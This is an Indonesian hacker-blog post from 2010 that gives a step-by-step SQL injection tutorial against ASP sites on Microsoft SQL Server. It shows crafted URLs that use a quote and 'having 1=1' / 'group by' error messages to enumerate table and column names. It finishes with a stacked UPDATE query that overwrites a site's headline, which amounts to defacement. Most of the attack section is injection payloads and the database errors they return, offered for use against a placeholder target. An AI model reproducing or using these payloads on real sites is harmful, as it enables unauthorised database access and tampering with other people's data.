Clock ( WIB )

Jumat, 09 Juli 2010

SQLI ( Injection ASP )

SQLI ( Injection ASP )

CONTOH :

http://www.target.com/dari_media.asp?id=795

http://www.target.com/dari_media.asp?id=795'

Muncul nya seperti ini :

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'media.Tanggal' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/dari_media.asp, line 7

Berarti Web tersebut Vuln... ,~_~, Lanjutkan...!!!

Lalu tambahkan %20having%201=1

Contoh :

http://www.target.com/dari_media.asp?id=795%20having%201=1

Muncul nya : Column 'media.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

*Keterangan : ‘media.ID’ (Artinya table = media dan column = ID)

*Jadi : Column 'media.ID'

Lalu cek table satu², contoh :

http://www.target.com/dari_media.asp?id=795%20group%20by%20media.ID%20having%201=1

MuncuL nya : Column 'media.Tanggal' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

Lalu tambahkan di belakang media.ID,media.Tanggal seperti ini:

http://www.target.com/dari_media.asp?id=795%20group%20by%20media.ID,media.Tanggal%20having%201=1

Muncul nya : Column 'media.Jam' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

Lalu tambahkan lagi di belakang media.ID, media.Tanggal,media.Jam seperti ini :

http://www.target.com/dari_media.asp?id=795%20group%20by%20media.ID,media.Tanggal,media.Jam%20having%201=1

Muncul nya : Column 'media.sumber' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

Lalu tambahkan lagi di belakang media.ID, media.Tanggal,media.Jam,media.sumber seperti ini :

http://www.target.com/dari_media.asp?id=795%20group%20by%20media.ID,media.Tanggal,media.Jam,media.sumber%20having%201=1

Munculnya :Column 'media.Headline' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

Lalu teruskan sampe Mentok sampai tidak ada kata² contoh :

Tidak ada lagi kata² : Column ‘xxx.xx’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

klo da mentok ganti jadi gini :

Taro di headline / terserah lo aja, nah gw mau taro nya di headline, jika tidak ada headline cari kata² yg lain “suka² lo aja” ( pokoknya yg berbau² di depan hal admin ), masukkan kata² itu.

Contoh nya :

http://www.target.com/dari_media.asp?id=795%20update%20media%20set%20headline%20='Terserah lo mau kata² apa';--%20????

Created By Sudden_Death

Bookmark and Share

Diposting oleh -==[Md_HoLiC]==- di 01.35

0 komentar:

:)) :)] ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} ~x( :-t b-( :-L x( =)) :a: :b: :c: :d: :e: :f: :g:
:h: :i: :j: :k: :l: :m: :n:

Posting Komentar



 
Blog_Cupu_Bukan_Untuk_Para_Master | Template Ireng Manis © 2010 Free Template Ajah. Distribution by Dhe Template. Supported by Cash Money Today and Forex Broker Info